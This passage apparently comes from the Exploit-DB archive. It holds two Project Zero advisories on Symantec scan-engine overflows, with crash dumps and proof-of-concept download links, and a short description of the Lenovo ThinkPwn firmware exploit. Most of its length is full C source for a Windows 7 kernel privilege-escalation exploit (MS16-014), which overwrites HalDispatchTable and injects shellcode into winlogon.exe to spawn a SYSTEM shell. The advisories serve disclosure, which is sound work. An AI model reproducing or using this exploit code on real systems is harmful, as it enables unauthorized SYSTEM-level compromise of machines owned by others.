#8 0x063d13cb in CDecomposer::Process(IDecObject*, IDecEventSink*, IDecIOCB*, unsigned short*, char*) ()
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40035.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=823
A PowerPoint PPT file is a complicated OLE compound document comprising of a series of streams. The format is described by Microsoft in [MS-PPT].
https://msdn.microsoft.com/en-us/library/office/cc313106(v=office.12).aspx
Symantec have implemented an I/O abstraction layer for seeking within the streams of a compound document, which they use to extract embedded objects like VBA macros and so on. Unfortunately, a bug in this I/O abstraction results in a critical security vulnerability. The bug occurs when a read request can be satisfied from the cache, but from a non-zero start offset. In this case, the request size is always rounded to (CACHE_SIZE - Offset), which may not be correct.
For example, a read request that can be satisfied from the stream cache in these ways:
+-------------------------+
| CACHE |
+-------------------------+
1. <---------> Non-zero offset, but entire cache needed.
2. <------> Zero offset, but not the entire cache.
3. <----------------------> Entire cache.
4. <----> Non-zero offset and not entire cache.
All of these cases work fine except 4, where a buffer overflow occurs, because the request is rounded up to (CACHE_SIZE - Offset). It seems incredible that this bug wasn't found during testing or even on ITW documents just by chance. Nevertheless, by carefully constructing a powerpoint file with a series of records that massage the cache with a series of records, we can trigger a stack buffer overflow of attacker controlled data.
The easiest way to do this is via PPFindRecSet in libdec2ss (this is part of ccScanw.dll on Windows). Early on when processing powerpoint documents Symantec attempt to find the last edit via RT_UserEditAtom, then extract a set of records for RT_List and RT_ExternalObjectList allowing us to massage the stream cache appropriately.
Naturally, Symantec disable /GS on Windows and do not use -fstack-protector, making exploitation absolutely trivial. The attached document redirects execution to 0x41414141 reliably on Windows.
0:065> g
(1074.a14): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=000025a0 ecx=00000200 edx=000025a0 esi=0396e358 edi=00002524
eip=41414141 esp=056df558 ebp=00000000 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???
0:065> lmv m ccScanW
start end module name
65820000 65a4f000 ccScanw (deferred)
Image path: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Image name: ccScanw.dll
Timestamp: Tue Jan 26 13:51:55 2016 (56A7EA7B)
CheckSum: 0022B3ED
ImageSize: 0022F000
File version: 13.1.2.19
Product version: 13.1.2.19
File flags: 0 (Mask 3F)
File OS: 40004 NT Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Symantec Corporation
ProductName: Symantec Security Technologies
InternalName: ccScan
OriginalFilename: CCSCAN.DLL
ProductVersion: 13.1.2.19
FileVersion: 13.1.2.19
FileDescription: Symantec Scan Engine
LegalCopyright: Copyright (c) 2015 Symantec Corporation. All rights reserved.
The fix is simply to round up requests to MIN(RequestSize, CACHE_SIZE).
I verified this bug exists on the following products:
* Norton Antivirus (All Platforms)
* Symantec Endpoint (All Platforms)
* Symantec Scan Engine (All Platforms)
* Symantec Email Security (All Platforms)
And probably all other Symantec and Norton branded products.
NOTES:
PPGetVBAEmbedListInfo() uses PPFindRecSet(), which is definitely the easiest way to exploit this. The prototype is something like:
int PPFindRecSet(tagSS_STREAM *stream,
unsigned StartOffset,
unsigned EndOffset,
short count,
short *RequiredRecordTypes,
unsigned *RecordOffsets,
int *RecordLengths);
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40037.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=821
A major component of the Symantec Antivirus scan engine is the "Decomposer", responsible for unpacking various archive formats such as ZIP, RAR, and so on. The decomposer runs as NT AUTHORITY\SYSTEM on Windows, and root on Linux and Mac. Simple fuzzing of zip archives discovered missing bounds checks in the routine ALPkOldFormatDecompressor::UnShrink, used to decode Zip archives.
The routine uses a 16bit value read from the file to index a 256 element array without any bounds checking, the attached testcase should demonstrate this reliably. I have verified this on the following products:
Norton Antivirus, Windows
Symantec Endpoint Protection, Linux and Windows
Symantec Scan Engine, Linux and Windows
(534.700): Access violation - code c0000005 (!!! second chance !!!)
eax=00003000 ebx=00003000 ecx=00003000 edx=00002000 esi=16adeb58 edi=16ad8b1b
eip=6ba47ec3 esp=16ad6af0 ebp=16adeb20 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
ccScanw!filelengthi64+0x3af63:
6ba47ec3 66399445fcbfffff cmp word ptr [ebp+eax*2-4004h],dx ss:002b:16ae0b1c=????
0:071> ub
ccScanw!filelengthi64+0x3af3f:
6ba47e9f 8bb5ec7fffff mov esi,dword ptr [ebp-8014h]
6ba47ea5 8bc7 mov eax,edi
6ba47ea7 8985e07fffff mov dword ptr [ebp-8020h],eax
6ba47ead e96d010000 jmp ccScanw!filelengthi64+0x3b0bf (6ba4801f)
6ba47eb2 0fbfc3 movsx eax,bx
6ba47eb5 ba00200000 mov edx,2000h
6ba47eba 8dbdfb9fffff lea edi,[ebp-6005h]
6ba47ec0 0fb7cb movzx ecx,bx
0:071> lmv m ccScanw
start end module name
6b930000 6bb5f000 ccScanw (export symbols) C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Loaded symbol image file: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Image path: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Image name: ccScanw.dll
Timestamp: Tue Jan 26 13:51:55 2016 (56A7EA7B)
CheckSum: 0022B3ED
ImageSize: 0022F000
File version: 13.1.2.19
Product version: 13.1.2.19
File flags: 0 (Mask 3F)
File OS: 40004 NT Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Symantec Corporation
ProductName: Symantec Security Technologies
InternalName: ccScan
OriginalFilename: CCSCAN.DLL
ProductVersion: 13.1.2.19
FileVersion: 13.1.2.19
FileDescription: Symantec Scan Engine
LegalCopyright: Copyright (c) 2015 Symantec Corporation. All rights reserved.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40036.zip
/*
# Exploit Title: Elevation of privilege on Windows 7 SP1 x86
# Date: 28/06-2016
# Exploit Author: @blomster81
# Vendor Homepage: www.microsoft.com
# Version: Windows 7 SP1 x86
# Tested on: Windows 7 SP1 x86
# CVE : 2016-0400
MS16-014 EoP PoC created from
https://github.com/Rootkitsmm/cve-2016-0040/blob/master/poc.cc
Spawns CMD.exe with SYSTEM rights.
Overwrites HaliSystemQueryInformation, but does not replace it, so BSOD will occur at some point
********* EDB Note *********
ntos.h is available here: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40039.zip
***************************
*/
#include "stdafx.h"
#include <Windows.h>
#include <winioctl.h>
#include "ntos.h"
#include <TlHelp32.h>
typedef union {
HANDLE Handle;
ULONG64 Handle64;
ULONG32 Handle32;
}
HANDLE3264, *PHANDLE3264;
typedef struct {
ULONG HandleCount;
ULONG Action;
HANDLE /* PUSER_THREAD_START_ROUTINE */ UserModeCallback;
HANDLE3264 UserModeProcess;
HANDLE3264 Handles[20];
}
WMIRECEIVENOTIFICATION, *PWMIRECEIVENOTIFICATION;
#define RECEIVE_ACTION_CREATE_THREAD 2 // Mark guid objects as requiring
typedef struct {
IN VOID * ObjectAttributes;
IN ACCESS_MASK DesiredAccess;
OUT HANDLE3264 Handle;
}
WMIOPENGUIDBLOCK, *PWMIOPENGUIDBLOCK;
typedef enum _KPROFILE_SOURCE {
ProfileTime,
ProfileAlignmentFixup,
ProfileTotalIssues,
ProfilePipelineDry,
ProfileLoadInstructions,
ProfilePipelineFrozen,
ProfileBranchInstructions,
ProfileTotalNonissues,
ProfileDcacheMisses,
ProfileIcacheMisses,
ProfileCacheMisses,
ProfileBranchMispredictions,
ProfileStoreInstructions,
ProfileFpInstructions,
ProfileIntegerInstructions,
Profile2Issue,
Profile3Issue,
Profile4Issue,
ProfileSpecialInstructions,
ProfileTotalCycles,
ProfileIcacheIssues,
ProfileDcacheAccesses,
ProfileMemoryBarrierCycles,
ProfileLoadLinkedIssues,
ProfileMaximum
} KPROFILE_SOURCE, *PKPROFILE_SOURCE;
typedef struct _DESKTOPINFO
{
/* 000 */ PVOID pvDesktopBase;
/* 008 */ PVOID pvDesktopLimit;
} DESKTOPINFO, *PDESKTOPINFO;
typedef struct _CLIENTINFO
{
/* 000 */ DWORD CI_flags;
/* 004 */ DWORD cSpins;
/* 008 */ DWORD dwExpWinVer;
/* 00c */ DWORD dwCompatFlags;
/* 010 */ DWORD dwCompatFlags2;
/* 014 */ DWORD dwTIFlags;
/* 018 */ DWORD filler1;
/* 01c */ DWORD filler2;
/* 020 */ PDESKTOPINFO pDeskInfo;
/* 028 */ ULONG_PTR ulClientDelta;
} CLIENTINFO, *PCLIENTINFO;
typedef struct _HANDLEENTRY {
PVOID phead;
ULONG_PTR pOwner;
BYTE bType;
BYTE bFlags;
WORD wUniq;
}HANDLEENTRY, *PHANDLEENTRY;
typedef struct _SERVERINFO {
DWORD dwSRVIFlags;
DWORD64 cHandleEntries;
WORD wSRVIFlags;
WORD wRIPPID;
WORD wRIPError;
}SERVERINFO, *PSERVERINFO;
typedef struct _SHAREDINFO {
PSERVERINFO psi;
PHANDLEENTRY aheList;
ULONG HeEntrySize;
ULONG_PTR pDispInfo;
ULONG_PTR ulSharedDelta;
ULONG_PTR awmControl;
ULONG_PTR DefWindowMsgs;
ULONG_PTR DefWindowSpecMsgs;
}SHAREDINFO, *PSHAREDINFO;
#define IOCTL_WMI_RECEIVE_NOTIFICATIONS CTL_CODE(FILE_DEVICE_UNKNOWN, 0x51, METHOD_BUFFERED, FILE_WRITE_ACCESS)
typedef ULONG(__stdcall *g_ZwMapUserPhysicalPages)(PVOID, ULONG, PULONG);
typedef NTSTATUS(_stdcall *_NtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
typedef NTSTATUS(_stdcall *_NtQueryIntervalProfile)(KPROFILE_SOURCE ProfilSource, PULONG Interval);
DWORD g_HalDispatchTable = 0;
void* kHandle;
HWND g_window = NULL;
const WCHAR g_windowClassName[] = L"Victim_Window";
WNDCLASSEX wc;
PSHAREDINFO g_pSharedInfo;
PSERVERINFO g_pServerInfo;
HANDLEENTRY* g_UserHandleTable;
LRESULT CALLBACK WProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
return DefWindowProc(hwnd, uMsg, wParam, lParam);
}
DWORD getProcessId(wchar_t* str)
{
HANDLE hProcessSnap;
PROCESSENTRY32 pe32;
DWORD PID;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == INVALID_HANDLE_VALUE)
{
return 0;
}
pe32.dwSize = sizeof(PROCESSENTRY32);
if (!Process32First(hProcessSnap, &pe32))
{
CloseHandle(hProcessSnap);
return 0;
}
do
{
if (!wcscmp(pe32.szExeFile, str))
{
wprintf(L"Process: %s found\n", pe32.szExeFile);
PID = pe32.th32ProcessID;
return PID;
}
} while (Process32Next(hProcessSnap, &pe32));
return 0;
}
void Launch()
{
void* pMem;
char shellcode[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e"
"\x65\x78\x65\x00";
wchar_t* str = L"winlogon.exe";
DWORD PID = getProcessId(str);
HANDLE hEx = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
pMem = VirtualAllocEx(hEx, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
DWORD res = WriteProcessMemory(hEx, pMem, shellcode, sizeof(shellcode), 0);
HANDLE res2 = CreateRemoteThread(hEx, NULL, 0, (LPTHREAD_START_ROUTINE)pMem, NULL, 0, NULL);
}
BOOL leakHal()
{
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQuerySystemInformation");
PRTL_PROCESS_MODULES pModuleInfo;
DWORD ntoskrnlBase;
DWORD HalDTUser, HalDTOffset;
HMODULE userKernel;
pModuleInfo = (PRTL_PROCESS_MODULES)VirtualAlloc(NULL, 0x100000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (pModuleInfo == NULL)
{
printf("Could not allocate memory\n");
return FALSE;
}
NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, 0x100000, NULL);
ntoskrnlBase = (DWORD)pModuleInfo->Modules[0].ImageBase;
userKernel = LoadLibraryEx(L"ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES);
if (userKernel == NULL)
{
printf("Could not load ntoskrnl.exe\n");
return FALSE;
}
HalDTUser = (DWORD)GetProcAddress(userKernel, "HalDispatchTable");
HalDTOffset = HalDTUser - (DWORD)userKernel;
g_HalDispatchTable = ntoskrnlBase + HalDTOffset + 0x9000;
return TRUE;
}
BOOL setup()
{
LoadLibraryA("user32.dll");
wc.cbSize = sizeof(WNDCLASSEX);
wc.style = 0;
wc.lpfnWndProc = WProc;
wc.cbClsExtra = 0;
wc.cbWndExtra = 0;
wc.hInstance = NULL;
wc.hCursor = NULL;
wc.hIcon = NULL;
wc.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
wc.lpszMenuName = NULL;
wc.lpszClassName = g_windowClassName;
wc.hIconSm = NULL;
if (!RegisterClassEx(&wc))
{
printf("Failed to register window: %d\n", GetLastError());
return FALSE;
}
g_window = CreateWindowEx(WS_EX_CLIENTEDGE, g_windowClassName, L"Victim_Window", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 240, 120, NULL, NULL, NULL, NULL);
if (g_window == NULL)
{
printf("Failed to create window: %d\n", GetLastError());
return FALSE;
}
g_pSharedInfo = (PSHAREDINFO)GetProcAddress(LoadLibraryA("user32.dll"), "gSharedInfo");
g_UserHandleTable = g_pSharedInfo->aheList;
g_pServerInfo = g_pSharedInfo->psi;
return TRUE;
}
DWORD leakWndAddr(HWND hwnd)
{
DWORD addr = 0;
HWND kernelHandle = NULL;
for (int i = 0; i < g_pServerInfo->cHandleEntries; i++)
{
kernelHandle = (HWND)(i | (g_UserHandleTable[i].wUniq << 0x10));
if (kernelHandle == hwnd)
{
addr = (DWORD)g_UserHandleTable[i].phead;
break;
}
}
return addr;
}
VOID SprayKernelStack() {
g_ZwMapUserPhysicalPages ZwMapUserPhysicalPages = (g_ZwMapUserPhysicalPages)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "ZwMapUserPhysicalPages");
if (ZwMapUserPhysicalPages == NULL)
{
printf("Could not get ZwMapUserPhysicalPages\n");
return;
}
BYTE buffer[4096];
DWORD value = g_HalDispatchTable - 0x3C + 0x4;
for (int i = 0; i < sizeof(buffer) / 4; i++)
{
memcpy(buffer + i * 4, &value, sizeof(DWORD));
}
printf("Where is at: 0x%x\n", buffer);
ZwMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
}
__declspec(noinline) int Shellcode()
{
__asm {
mov eax, kHandle // WND - Which window? Check this
mov eax, [eax + 8] // THREADINFO
mov eax, [eax] // ETHREAD
mov eax, [eax + 0x150] // KPROCESS
mov eax, [eax + 0xb8] // flink
procloop:
lea edx, [eax - 0xb8] // KPROCESS
mov eax, [eax]
add edx, 0x16c // module name
cmp dword ptr[edx], 0x6c6e6977 // �winl� for winlogon.exe
jne procloop
sub edx, 0x170
mov dword ptr[edx], 0x0 // NULL ACL
ret
}
}
int main() {
DWORD dwBytesReturned;
HANDLE threadhandle;
WMIRECEIVENOTIFICATION buffer;
CHAR OutPut[1000];
if (!setup())
{
printf("Could not setup window\n");
return 0;
}
PVOID userSC = VirtualAlloc((VOID*)0x2a000000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
kHandle = (void*)leakWndAddr(g_window);
memset(userSC, 0x41, 0x1000);
memcpy(userSC, Shellcode, 0x40);
if (!leakHal())
{
printf("Could not leak Hal\n");
return 0;
}
printf("HalDispatchTable is at: 0x%x\n", g_HalDispatchTable);
DWORD value = (DWORD)userSC;
PBYTE buff = (PBYTE)&buffer;
for (int i = 0; i < sizeof(buffer) / 4; i++)
{
memcpy(buff + i * 4, &value, sizeof(DWORD));
}
printf("What is at: 0x%x\n", buff);
buffer.HandleCount = 0;
buffer.Action = RECEIVE_ACTION_CREATE_THREAD;
buffer.UserModeProcess.Handle = GetCurrentProcess();
HANDLE hDriver = CreateFileA("\\\\.\\WMIDataDevice", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hDriver != INVALID_HANDLE_VALUE) {
SprayKernelStack();
if (!DeviceIoControl(hDriver, IOCTL_WMI_RECEIVE_NOTIFICATIONS, &buffer, sizeof(buffer), &OutPut, sizeof(OutPut), &dwBytesReturned, NULL)) {
return 1;
}
}
_NtQueryIntervalProfile NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQueryIntervalProfile");
ULONG result;
KPROFILE_SOURCE stProfile = ProfileTotalIssues;
NtQueryIntervalProfile(stProfile, &result);
printf("SYSTEM shell comming\n");
Launch();
printf("All done, exiting\n");
return 0;
}
Source: https://github.com/Cr4sh/ThinkPwn
Lenovo ThinkPad System Management Mode arbitrary code execution exploit
***************************************************************************
For more information about this project please read the following article:
http://blog.cr4.sh/2016/06/exploring-and-exploiting-lenovo.html
This code exploits 0day privileges escalation vulnerability (or backdoor?) in SystemSmmRuntimeRt UEFI driver (GUID is 7C79AC8C-5E6C-4E3D-BA6F-C260EE7C172E) of Lenovo firmware. Vulnerability is present in all of the ThinkPad series laptops, the oldest one that I have checked is X220 and the neweset one is T450s (with latest firmware versions available at this moment). Running of arbitrary System Management Mode code allows attacker to disable flash write protection and infect platform firmware, disable Secure Boot, bypass Virtual Secure Mode (Credential Guard, etc.) on Windows 10 Enterprise and do others evil things.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40040.zip